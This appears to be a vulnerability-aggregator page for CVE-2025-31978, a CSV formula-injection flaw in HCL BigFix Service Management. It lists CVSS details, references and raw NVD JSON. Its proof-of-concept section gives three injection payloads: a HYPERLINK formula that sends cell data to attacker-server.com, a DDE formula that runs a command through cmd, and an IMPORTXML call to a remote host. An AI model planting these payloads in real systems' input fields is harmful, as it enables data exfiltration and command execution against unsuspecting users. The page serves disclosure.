CVE-2025-31978

Description

HCL BigFix Service Management (SM) does not adequately sanitize or safely render spreadsheet files (CSV, XLS, XLSX) before processing or distributing them. An attacker could populate data fields which, when saved to a CSV file, may attempt information exfiltration or other malicious activity when automatically executed by the spreadsheet software. Note that current versions of Excel warn users of untrusted content.

CVSS Details

CVSS Score

4.6

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:hcltech:bigfix_service_management:23.0:*:*:*:*:*:*:* - VULNERABLE

未在提供信息中明确指定（请参考HCL官方公告KB0128144）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CSV Injection in HCL BigFix SM
# Inject the following payload into a vulnerable input field (e.g., username, ticket description)

# Payload 1: Information Exfiltration (Exfiltrates cell A1 content)
payload_info = "=HYPERLINK(\"http://attacker-server.com/steal.php?data=\"&A1,\"Click Here\")"

# Payload 2: OS Command Execution (Legacy Excel, DDE)
payload_cmd = "=cmd|' /C calc'!A0"

# Payload 3: Importing remote data
payload_import = "=IMPORTXML(\"http://attacker-server.com/malicious.xml\", \"//item\")"

# Explanation:
# When the application exports this data to a CSV file and a user opens it in Excel,
# Excel interprets the string starting with '=' as a formula.
# If the user accepts the security prompt, the formula executes.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-31978
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-31978
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-31978/
[4] VulDB https://vuldb.com/cve/CVE-2025-31978
[5] https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128144

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-31978", "sourceIdentifier": "[email protected]", "published": "2026-05-06T15:16:06.207", "lastModified": "2026-05-07T16:26:10.870", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL BigFix Service Management (SM) does not adequately sanitize or safely render spreadsheet files (CSV, XLS, XLSX) before processing or distributing them. An attacker could populate data fields which, when saved to a CSV file, may attempt information exfiltration or other malicious activity when automatically executed by the spreadsheet software. Note that current versions of Excel warn users of untrusted content."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_service_management:23.0:*:*:*:*:*:*:*", "matchCriteriaId": "4D915AC1-7C2B-497D-9A77-9726954B2282"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128144", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}